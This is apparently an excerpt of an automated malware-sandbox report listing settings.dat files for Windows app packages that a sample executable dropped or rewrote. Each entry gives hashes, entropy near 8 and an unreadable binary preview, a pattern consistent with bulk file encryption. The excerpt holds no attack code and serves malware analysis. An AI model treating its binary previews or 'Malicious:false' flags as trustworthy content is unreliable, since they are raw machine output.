                                                                                                                                                                                                    MD5:A6B8D1B044FAD9B753ABABC7812CF2E5
                                                                                                                                                                                                    SHA1:D6BE2131B99CD6A96B92E27E30DC3BDEAD495E2C
                                                                                                                                                                                                    SHA-256:A2469B89B2B9AD83FE8B21D1E5D575D07017E51B1440BE1898B651C96E9AC7B1
                                                                                                                                                                                                    SHA-512:B2BA18AE31C294ED1E7A54AC857CC95C3F4DB23DA17D8384DF2326EF5DE1F3734E3FE9002D235C70987CEC0E35D1C7D200E7875A847F6FF536B9A910E15ACAAD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...Z.8.....2...%....h.-..-.*^......VZ.2zkKd.s{.A..!{.:t..0[.].3X..8....l....Y...QJ....l-.M...../.........r=..D?.P...l3\.N..`.".OKg.olV....@[3AMe..ZH..%.bx.u.m\....$#..Cy...i.G.....5.|....L1..K.?..d..3.....[...-B.....l.....{B$...P.....E.....@<..$'g!dg...|t....r..vB....v.]n..0........Y7e...K....V.S6O......'..BrY%v....)..m....+.(N..d..Z].Bou,.N.=_.,.F../d...JrB...X..O..!.:.......]..v....JW...^.......w...-...T.x}@.....B.L..D27.5...LcY~...]..../:...{.C{,'SL]l....]F..l..?}.....i.@uSC.I..yp..F.V..qYQ.%K::...3....3&....x..<Y.qM.>.~s..7..<..%Z.r?.[.............f*.|d.V...P..=H.t....!Y."iK....Kx>.2f......Dn)...^..a:...,t...J..r.OCn..z...u9..M...M.h....T..>p7..g......G..Gm..H.yV..(.j6..l.m.a...E..Y.Y..j..a.I\.....}....J\...#..6...%..h,t........?A.M....W...S.........y..I6].qdW..r......>e..m.U...t.=(..Q....d.)..v..HG..-w..,.".......o...._...z..u...l..x..M.~.H..&.S......Y.|.DM.k....!f...o.N..u...&....D$s..."g.NVI.$P....>.O-Rc.m...1.p9.6@..Jjq.%
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980023680816586
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:bA4Qu0BAMLXdQ0Ulk2OCzaAVzwb416YhEZpuCzDCqaXwjZLN:bUvlLXuZOCeAtwbU1EZpfiqaXQZ
                                                                                                                                                                                                    MD5:76509A2331F8616F8673F7C4A704D0E4
                                                                                                                                                                                                    SHA1:21B1905443425A163D9E862497BABBA3B4BBBD7D
                                                                                                                                                                                                    SHA-256:D61304986909076C4DB9D63C111718174D0B79A9D35EF2C420BCE2DC054FA615
                                                                                                                                                                                                    SHA-512:FD032A8EF7A641E2C3BFFEF6C7FEE7730528A74BE41E240D311D7147273817E84A1F484DB017134CFACFA20E9F4CC8ADA06C1F092E9604E397D4715B5941D872
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 3|..G..[....I8`.....(M.g.o...#G. ....'64..C.T...)V.T.G.s.......1....mB.......Q.....P.I..\..'+SWdx!..z.^N....=>Q..3*.....x...2........../...@.=..k<'.....G./2......1nFrq.....:..u.......#v.K...b...]yU....?...g.B.)....i}.P.8.{.!POq..T._8..(...Z.*.".\/NWS.|#.#:.8..}H.u.Ix8..h..q..I@a.'Y...F.9.).J...w...F..-.eJ*hm.!...(7........<gU......zj.r.q.;'..wVBZ..iJ.....{...o[..K...9.7.S/.......O.J.L.L...L[.....5.;.2..r.F.......s.....V..A.wW,A~...F...s...e$L......F[.O...y.).....P.(..ru.w.:..M2.(.Z/.......~7..4*.Sx..F...`.......).M...S'......!.-....3.k.).^E..1.n.._..JL6>S..=,hv...#f.~.........INy[&~t ....N._..../f;U.8~..wI.xJ............Zmg...Tl.....c..v..[.....~@|6..,.1.w.p..b.Fs..%k@......Y>..''...!p0q&a..`.G_O..|.^..f...8/cX..|..^.V....9...[.b.5..........:.....g...3~.']..uc.R}....fG.q.....B....VBnK..jt.|..W.. .X,..x......R..........vE.".J..gK.$A...m..O.....W[.u......g.........I.s..4..J5......$g...Y....tLN'|f'...9..t[..v........>..o'.%..".%...$..].F.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.981599067606577
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:LyaEKKcx66BsNm2guzHMAyQVNx29amqAzNQm4mrP:1u4sc0zHEQU92ABzP
                                                                                                                                                                                                    MD5:874663606712611B13651B70B4093BA5
                                                                                                                                                                                                    SHA1:DFBF4FECA2E514DDF95136E2365CC30147F2390E
                                                                                                                                                                                                    SHA-256:93E99886CB8050DF71318C4CCC57DAC3934F93438FC35A0AEE7334D07F03E56A
                                                                                                                                                                                                    SHA-512:1518608677DDA7D51B30DCFEA2F8CB73EB5F7A71A2E12DA1AD77E89153F22AD92E0F4928FAB3BB2A08E6112D7CF83A3F375FF73569AFB0A3FE9E6445D09B3381
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..h<B....|ZeW.....8:..F.."1oz.|..B.e.F.\Y.C5.C...J...<.......Ta7h"K~X.@i.gI.8.^....:.A'a0.U.(...n.e..JF..S..]G......K.....)....Pc=.z}.J..|4.....Ov..w..ib].(...G................L.^...V......g....8e.....k+..*...n.Z......v..^z....V.....".H}q...N.k.C..oT..k.."...L....7[=..1......Q.....? I(|.....KPI7..dnis.U......rX'r.~n..nt.^...}.:.........=.M.,...k...x3.>.g.?...m.J%..9C.m.3..o...>`8.&VQ...e....g5.........`..S...e.Y..."...u.V.J....*..E........I.........O[....@vY..`>q...)..[..'xa.HJ..d.....U{)...E..Q.[.......{.....,...2U...k..3....T/..*......5;'.1......1.MRv..i}.v\.`....x^]..*...a$.|..<..f..9.. A../..uj...e.s.PY.B.3.....S..D..y.....Nr...N..........U.. .&...K@..(.6#....7.9..%.F.c....u.j.........Y.....[V...9.-.yox...Z...{.F_...n.@@......t...\.)......j.u.|.a'..{..++..<.sv....dOM.W..q^..Y..S.._.f.s.....(d..B...K..8.X..vdnZ.g....}.m...o...t..(.&w..a&...a.%?f B?..#gTQ..F..D....?.[x....B...nm.aDc:".Z.6H*|.]n/. .E{A.Fj.\..W.taC%,R'..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976895525142547
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:fwkFMbBVLuXBjkV4ipxYQaI7bpqcHYVUjLOfTWwTcz3BEs:fw/B4BkV4ipxFVLHWmOymcx5
                                                                                                                                                                                                    MD5:E30AAC717C91D716F1FDF1AA9CABD325
                                                                                                                                                                                                    SHA1:22F433A980ED99E8D2863CDC34E859020DD97E9A
                                                                                                                                                                                                    SHA-256:2266ED3CDAD77279F04F107917A9EFBD8E024945A1D084DB726AF3B9978EAD0E
                                                                                                                                                                                                    SHA-512:D08742E3B87D01B0402B1085788CA06C0A736E50576B64A169760D9BE0C0D5A0933A0B0C120DCB99CFF4979F4220BD6C0FF23514C51EEF56E1010651BBEA815B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 8w.P...9*y..x..0..n..n.#.[}.....;...fS....G{Ym...T....2N].......(9d<.aF.W.vJ@........Vw.;Zb......T..^..DT.ML..I.....n-&.G...W;....C.HC..+k..2......<.mp..wX.~.f.t,y.....,f.x+.8..ib...8..%..g..K.w.;.Q........{.....Ef.U~)w........9{.]."..G....1.;.m..Y..|**..U.y+.-..'..}:.....tS..z.V...L.VPn..K..D......7..p.#.e...o"...'E.E. Z.X.!.f..k.*$(.%#..5#..........L.j."........[^l.H...dg..V......d#.P.....r.c%..Y..Ige.....A..T.Ke.0.mW.u.....W..D`b...^.....:..VE$}7?*yJ$-/;...N..?\..>@...%....4.:.S.R.Ug)..O]K.F....>.}Q..5)c..].....G]Z...._,.j......X.e..5.DR.:..8._.K..!8@.,.....^Z.B"..J8w...../........0+..P.-...../eEBY..+o.%:..a..X...eeI.....~0...RJ}C.T.."%.^Q[.X(!f.gL/Os.\..y.....z.."W..v(d.........l$.....@)W.....#......zy.a.bC..v...v'..y.....B.`._f......$....?Q..]U.l.s.2m.c.................#.....|rx.#u..Y...h......X.~......X$:E...4E..E..........Q..t....(.2P..S....W.....vW.p..A......_..f.2zE.P...5..7.rp..&e...Q......y..[...bl.Qm........E+M.}GM..$%.?i.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976113578385722
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:njfUZNMJGXR8FSOTcI9rl0twV4Zx4X4A8W81GUPc+pVkFPDKH:njpjFhk8e4oA8W81GP+EJDKH
                                                                                                                                                                                                    MD5:8594AFAAEC855DAE0A6FD0DD2F6B873C
                                                                                                                                                                                                    SHA1:9C39364FB529146C4E281A20D990A174BE8CAF14
                                                                                                                                                                                                    SHA-256:A1AC680848F29DD670FBE444F4AB13BC130CEF443A27A97452D483D0E0EECBCF
                                                                                                                                                                                                    SHA-512:93952BF55293A94B4F575B84E5B24B8E5416C2336172818BFC18D9E5A47115D42BB2A3EB256FFB3705E60318A1DBA81A4D89BB97702C7DAA85FEDAE03A9C354C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..t...p.EP....~.....E..hW\.1.-G....l...+.IV+~.S.........#h.0Ag._f!..B..Z.!...xi....}$NF.N..E.9K...}.}7..U-.~..<.(]..x.}pN.o.....Guq......Q.qa.7}rb.jQ.$..p.o..#......4...5.#..].*...)..]..b[.=..x.....4U.......;.I!x....#/.YI)..e.!...m.c=..s...F.Qo..1.5..:.J...D..l....5.{.OoG..|.q.98j...%...g..k~3....+..q../m.7..{R....m..v..........K....b.AGi....B...-.~.4.7m!.h..pD.z...Q...G&HR1.-C.6.....5@..GN%..J>..9.j..?W..4]*?...]W#.$.R....G.j.r...5..o7.pt.]..J.>K...>....3...0...M..d.....i.Db.._......Sl.[.C....g.Yt1.Crc.y.a...w..L.y..].%...q..h.W~v..R..*...-..R.....] ...."..K7..y.M.&g.E....j.~..%.....s....W....7.(.Z@..I..,=...}N.@.....=......E........O......N.U.~:.:'(....Z....{iB..I)......p.3-;wgs^!...b..$@..i.J7w.Y.&7..Qh..."a.....q,.....V.......X4...~..G.tN.e.{...^z....'.~......L.&=9v.K?..+.x.W..v....t......`.^.....}u. .P..7.>..l....>C.|......F..?S.mp.=...4...E..{gFu..`B......-.....H.>o.;hzO..]...h{.n..[{y.r.|....J.S.rA..X...)U...).....]D.\.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9795885100628885
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:vU+T1Mm1eFSD5YgxSYZ4w9mpTKdnPj7t6gVyK7rL9osQYnX:s+Tf4FSDmgxS+V+KBggVy8rL9FX
                                                                                                                                                                                                    MD5:0EE36FD3320D7C624165B226ACC92D47
                                                                                                                                                                                                    SHA1:024F42206CBF43C8233ADB50AF03A5853D62D5CC
                                                                                                                                                                                                    SHA-256:A2CADC1538AA2E26AE151F3220B60EC3F94119237C26B9D772D58ACAA4DC0314
                                                                                                                                                                                                    SHA-512:08DA3D100F01EC13333D1A388180CA102A86DB201B1E54724B55CFFF657663A6516A99A6710C95DDCE2EA12A738C3019A01F3C17CE9F1623E9545698E6665F9F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: sB5.l..R...y.....["..3....5.Q.&[;.....p....,..:....e.>....Xr....t.n...1*M;.....9..7c..m.B...l.hw..!..k.8..{..IC..}.Q...(..S.d/2#.h.$i....D.z..W^......V..-.j.{.m.j....b.?......E.9..#..v....>^.h.".l.[RL....cF..q..F..\J......)..+......y.dm..r.....T...f}..........m....C....5...c..Li..Ut.'...c..2.......$..`.R.9..\.@..Al.rx.28KR.+.......D5.......4.6.._...C....'{k.|..I.sC%.,...r..... [.L.X/...u.y..x=K.......Y.H.[]/#a...|3!..{<>..L....J..!.4s..(..p............./..Tl..|v.Q.f.t.e...`.....Z`....UfQ.H})...d...y....A..h.1H(...sR.=....?....$.....8.>h...#..S...........A..d....e.>...}s....M]..\..?.3a..!........9..ch..^..;a..z..Mf..T......&..... 6?I.d...1.\..AW.M.]j.N\m.#....].....z{:@....)..S.....+b-....B...8j.q"..f.x.8...|..p..$..k..h..f.)...lx....zo.0....lz.gMM....^.....a. .../. H.T.nMs....-*...M..i1;..K.w...1.5N...W........0.....^=.GD.....d.&.._....f...W...@....Z....Y..]_+.G..ecA.....*...5b....C@......Ii..kp.e.Gf.K.1..F\m.u.........P
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.981101986490041
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Jj5XCbh0Fh1q+t6fjqg2K/nZ630vZEe0bREpVIdHgpojL:V5XCt0nwiMjqg2K/Z63IobwS3L
                                                                                                                                                                                                    MD5:91F300F09A3809CED74AE0BD3F5529A6
                                                                                                                                                                                                    SHA1:4AA0176C2D75D5F33AA5541B9D0D9500BF2FC754
                                                                                                                                                                                                    SHA-256:09C6F9A860BDC17A9958E63B6E7E8F4DFDB752CC90440291A10C35F1EEB117ED
                                                                                                                                                                                                    SHA-512:7AF46E80B09EE793C31D15205AEF924E860E2EFF65B5EDA4AA39A031C64682E801E4DEEDA8E347D7ABB6BD4D354FB11D3056FC25DB9742C4DA2969DDEFB4DABE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .UB...26........Pc[.F......g^..C.a.b...=.Y..zCu.^bxi..4..%.z.>S..8....8..*.3>.3.w...`C%[.rp.&.}......^I..A..........n..jKZ...Br!P).-.MS...,*.Yj&......+Y.....2...6......w....T.s..b.0.....".k..,.....b...j.<A.....[...&.......-)}^ N.........5..d....Fv.Cv@...rI...?.v1.iD..2.i..~.&.(.1.g.;......oJ.J|.T%.X.\..1V...>]..........7O5.K.y._...|t.....6...i......{.i$......."=.k.I}..u~.}..-.$c.H..P...P...6Gk.h..F.P#...S.........^.C.PN....>.....<`i...yK...Y.S..{..!u..0...#=.\.B..EB.x.qA.....{.I........l.i..g(...(.[.S{+1.....|.J..:.X..6g........k ..kjp..........^.!....[.2pv.........e.....5....o!.....@.84.......u....g..>{.L.#yZ...~.u.U..J.Ds.ji.R.y....[y)..<..L$..u.....oD.nh.FR......C...)N..j.8E..z...<..=...J..J..uW..,.)8..?..{....b.SK....\Xp.E.. ..o....2......f.@)ea.M.K.F.U.{.....O.._.@%..{.._..Z.5u.z..5k8Q...~...{......."...Z..oB..[.........i..........|<..,.Jv...]U_.Z..^......p1../f@..g..J.3.OIv.r1.|.(.....D?-..l9VU:.#T..I..c.G....Dk<.1.7.~.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977346754942772
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:wfIIUn6d+Cqc/LRXOMVj5yIKuTPCJP4cEocOO7VWU8Wk1LePGVVIw:w86d0c9Xfn2+P7OOpxcbIw
                                                                                                                                                                                                    MD5:9228E7D078794718D31CA6C950BA77A8
                                                                                                                                                                                                    SHA1:F246059DCFA18BE4216B3403D8A0E69879C6F237
                                                                                                                                                                                                    SHA-256:79D7BE835F9689F10FBF1CBC4EF6583748671D8916E9B8AE5C1DC456E4361334
                                                                                                                                                                                                    SHA-512:CD3E5EE9D0B72C0B25C16763524A9524589F5D3DF06AC19CF982826BFDE489FC04DAD5A24E8284BF092A10AD695E7340CECCF86B0B942F4AA0C284A7F81B5AC3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Xt...6.b^<A.[.t!G.%.%..^.9.zn...@pdq....@4W.....d...)....$8).y..S.m....".b...g...f...M..X.VA.......C.. ..X.....,.Ky......o:.]....1.-..........p.M.cq>D.e...DX..1.HR...[.....5#.0..E...O.w.$N.._.q.73...B....F.?n"K._.c..F......].;..`...[ZkH.U.pp..l..=..m6,....(# ..i...Bw.'..A.)>....S..P..T*.1.....f..v....:3...r...G...&...{J..N%...UdZ.%.... ..w.N......m...1.xY`.Q.I.....|q.....(..}...#.n...sH..'o.....[..h$...r.0..2..C.F...k..fV......Q....:.=...O}.]7...T.....V=.."...gC.S..K.e9.[...&.)c......5.B...<.q.7..q'8P;....ZGi.I.Q:d....H..X]U....suR4s M.......gX..G..v.R]......".{....x^.O.ur.T&.KB.._..}NT...w..T'|..t..j..|....H8.R._~I&..w..e.&.".?t.....IG|d.O..(.o..3{H.jK#>.ht.....AV.0e...../..h.A..~....."..#....0N.0h....o..9.6^.*.`......v...X8. .....#m.?.@....:..Z..kjM.9.%..y.(OO..B..j.....9..<...DbP.h...xiC.$Cw>...$..v._....{...s..&.M.De^mo.7.....s..m.o9.y>dm.....KQ..8.p.>....N.......Tk.o.w.k=.+..o...adm..Kl......FD.....e.......:+.wB.P.X.r
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97822989257035
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:uxNHBqUUk6YA3gQGurSzWYWlKmwYEeaPhBfEoBO9cw:uxNHTiYvArSzWYWlKaEpPhBf69cw
                                                                                                                                                                                                    MD5:81B842F29C8C95A3E2735102CDE5BB60
                                                                                                                                                                                                    SHA1:570E02ACAF130B6AF9B9C9C932F3624D0DB09BD9
                                                                                                                                                                                                    SHA-256:1EA2C262E62A2F8E1FFBC1D69E1A38160DE8E4165539748B0B7C6EF035939213
                                                                                                                                                                                                    SHA-512:68765C63154A4F64C3EF217BC499CB4CBC58A663629BD66E84C1CD15E09D4D64010AE86C79DB772E3A3351C71C4AA96DCF004457CD42C6FE33AB0D9EC29529D9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...%.6...Y..nz.+&X8aS1.\.q.(....c.B.'O2?.)..N......|....'^...2....~2...V.y....Y.."2Cz}@vf./V..N...+...".R+%b.q.&n...3i......].v$.......|.jQh..3.-....T..w....c.jF..Hw..a...[...hH....../k./. V...[>.7.j..j.qBf.~.."b"..}.4.i.q.|v/...#O.d.jT.,#..........4.".q.2.I...,...R........uZ.......<m..N.].....K.s...b.......7#..E$o..D..x.a.....a..#.....G%L.A....kYF.+..!y.Z......./.0Ay.....W%.....Y..qFA.[..M..........#+.|1...Y...+,..R_..v..*ET.T.r..9....}...=0.h.)..#....R1..t..:F.qH...n.]....c..K=...q...:4...eu..o.~...d..h.?Q...b...y.pI. ...(p.\...'wI.-.,)+.i......wed......+......!.T.?...I.#cX.....p=.. .. ....b`..*<.xc..X.ah...].OX...7..\.....w. ...L6...[v.R{....g<.J.B._..Z.......P@X....t-.|U.?g.d.1-..C.5)F.$C...\.....V..kQu..4=...N........u...D.....BK.[.].B..xb,39G..x.l.Kn...^.....?..i.....4{...9.. .=...8.....O.....,{....r.a-@..L....0.$.y.....X.O...)E.....|.lj]=......F.w..'u}z*&3=....M.+.........q...C.g.Yp,.S.{.V.s.L/..u..0..........r}<D.= ..b
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977327273479636
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:ZOf9VJHD11D2BAcbWlX1yQbbuZS01Ua37sJcNhB:yBjWBADp1r0Ka37sqNv
                                                                                                                                                                                                    MD5:7801B699EFFAC6AC20C535B3BFDEE87E
                                                                                                                                                                                                    SHA1:311EE82B7CF7B468FAF688C02F46ACEE502FA42A
                                                                                                                                                                                                    SHA-256:FD46327114CDD96DEC3A33A3D4C9823DD2A1BA334E1ECD74CD357EDE71935C5C
                                                                                                                                                                                                    SHA-512:A3BB8AB125E470810C36D031D23ECA90B2C7BFDCADD928CC7207239911719EA69506DCBE14B57787674982721794C7B0293CEE0AFD3C9B142DEF7AD69FEE5A97
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ........NU..^.........u.....Zz.!....V..o..P[..Q...C(W.7..L....6...!rY...oEv.I..t*$.e9e5...............l..~Z..XPJ......J.eE5.7....%.(.!...2.gTi0..}Y...C.T.?.nL@.d.B&.B..E.G$...Q(..".G.....u...I.X....:H..y.V.q..2.l...6.[O.i../..a.d.+..<..../..|P.R...C.w....H.!.8-.~.I.b..].f...)y...1.....t.-aS_.,...p...j...k[..\)..-.X.....:.......O..>..V;.4..F|C.0.[.5.NYzg.+..-.`e,p.8.2+.d5.~...CT.{b.q.).......z.._.. {.Yd3..@B...|.....%.....].6Z.B...x...D.L...o..^E..T.......[.&m.pB.....P>.E..L&.{y.....s8.<B..R..g...W.u@....'8.IOG.....9....9.(6k/LX.q.._Yf..dP6%....%..2..,....d....^.'{.g....u...c,B..fC...{.C.....o8.7..3a...$.j...._........O..rs.sx..D...K..L.H...............a.\%$..MsJ>..0..`..c(.g..:.....$.w<Q.......=J..N........q.&.1.qVC2.R8.d..^.D.jU..$cA%.\b.z.....]...V..'..)..6...``}T..X,........|.2...s]...o....B.7..e.R...n.FV;....h....'Ap..t.t..1J@8}......b.b@<.C.[..q...@...^...}(...`.......~"v.X6...tI..bk...@h_....BV#..~S.'kzM.y..R..f...uqq..&@8.j.-.Q..._..N.!.lD...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Print3D_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975904439379363
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:LflryShXO4RA22sgrkvzGTHpUBQN7UeGU+JXSOTTM:LNGS5LRA2GQEpyc78NJXSiY
                                                                                                                                                                                                    MD5:87A9EEB31EB7B1A6471EFD6267E6433A
                                                                                                                                                                                                    SHA1:17B5868A4B4F40C720BAD128FE14617DB24D2D9D
                                                                                                                                                                                                    SHA-256:2E11B174DDC4968986F54D3F48D0FB8396002618ACD89370132EF62DF56C6386
                                                                                                                                                                                                    SHA-512:3F236DAEE71E1C905248C04401AE1F77903995C7C5C2378248930E94AFB49F6AEFDAB228AC245C4E6F4089CDB44FBD272165382C3B79770FF3272B14CB509377
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...O,C."...#.=..zj..G.7`t.z..d.|... P...#.8...Q.b(.l.-.<.yc..P[x....r...A7.C.vjp..8.xx\......P.}-`..)..U.C..b{.q\t."8....8EE|...=....{...7...b.0..:..].=.>3.}..Ve..\.T....I.Hh.(..h.b,...c....y..P..I..P.....4..q.i>z.mAD.M.=......*i.;..J....z`..h.4.U.&j..g.....w........K.i[kG4nJ....;.......ki..[.-a..........L.]A.....\........XZ.../Z4 Y7j.s).-..W......q.^L&.#.z.z.p......).,t.(.a..eL............'+..U..I:(.=.c...6j..dQ..,....T......5.p...W.\R...WAP....|\....\..$uE..0{.'.>G_.#......Iw.J..][..J.x..dj..%.....o...$...b.n.*.I..I`*D.'..a#..E.P..s....l}]\.>.+.f.h4.....W.9.u...^r....X...>.1....v..F=s..P..1o[9.~8W..7m.[*^..;2..Q.X..%..s{.6)..(..0U..Gj5p.+D.k...a."...\._.?q2. ....E5..g..5U.g./..5.l~R'...U..*....e..Va`....L.{.....,b.. .0..-.90Z&...0..L..8',c.1..O..`.f.O...fl.Z...f....60..........^.D."..UUOj.t.......G1........r.......6......%...<.i...(...3..c.O..t.k....."#X1...K.T@.fj.).e....Z,..*..(*..*.....g.M..i..J.%..n....p..@.m.y.3.......0]9(.@ bV(.a?.7...u
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.979163299435657
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:XLZrOYFchSMs/ZHwN4Y2DbzmdQgRBThvfBDfIsEGn4j:7ZKyceNwK/3zkLLThvf5fIsEGu
                                                                                                                                                                                                    MD5:2989AD8A885C0D2604B4B53D0F3A76D9
                                                                                                                                                                                                    SHA1:483BCB91798106BC16DBC5C8FBCD32BFBD339AE3
                                                                                                                                                                                                    SHA-256:DFD73236BCA2A5FB0E3FD938D53142241A979E83900955A7FB043D3955A9B3B6
                                                                                                                                                                                                    SHA-512:F021B5ED75363BA751C04177741B24D21DF72A1765E9E30E1B6624A3FD9AD4D33ADF99465B07A6F7EEA6E2B54078D2461681F9E5E06348B9A597C7B298FCDF59
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Hu.d..K....x.!.H.d..7.H.'y..0..(.mY5..(.......`..Z.....}B..R..u>>D7yL...{...].0...A.....y..i[.j..y.k.D..6]GD.] +..........E.......z((.H.M.4.%FB.E.<.]..\Q..$....(..1x...;.....\..<.t...z.x..d...J.H...mo....\.....v...4~.~..|..>..o.5B.~......#TG.~..B.........V&.,.}.. .!...'.:.0.......{stUe."b.t....!#~......XD.O.Tcy......4.Vp{...vh..v1.x.s.e.vlQF..[.........f>-Q(...1....C.......YQ..........c...;.:....1t,.../4sW0"....YV.,.....=.<. Ng:Q..s>.|.T..S..0E.x#.T..`v.b.2n..sY..U.Py...3j.p=....e.....1.g*../..M(...}...<......`.d....hTfC.<k{...S.1...8...X........G....l.).e...)9..c...Oo...F.......]zM5.!.x7.4..ea..-.TCx.......4%ACz.P...Q_*......X.!lUSl.............8....4:_E2G.C.s0f.P.4..1....L..J.Rk..%!.'....L/`..q:...@...o;]P..... ..........0.4.....6..{.1i.v..{%~.......G......t.$h...?..>\../....r@..w..-.....i....]S.B.CA.6..^`......O.....T.....w....XP.....6..../MN...k[G'.......Qn..H...B..Vh.U.d....e|.....f...W....:m.."a..?.V".S..u....x..1......n9.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978143070510358
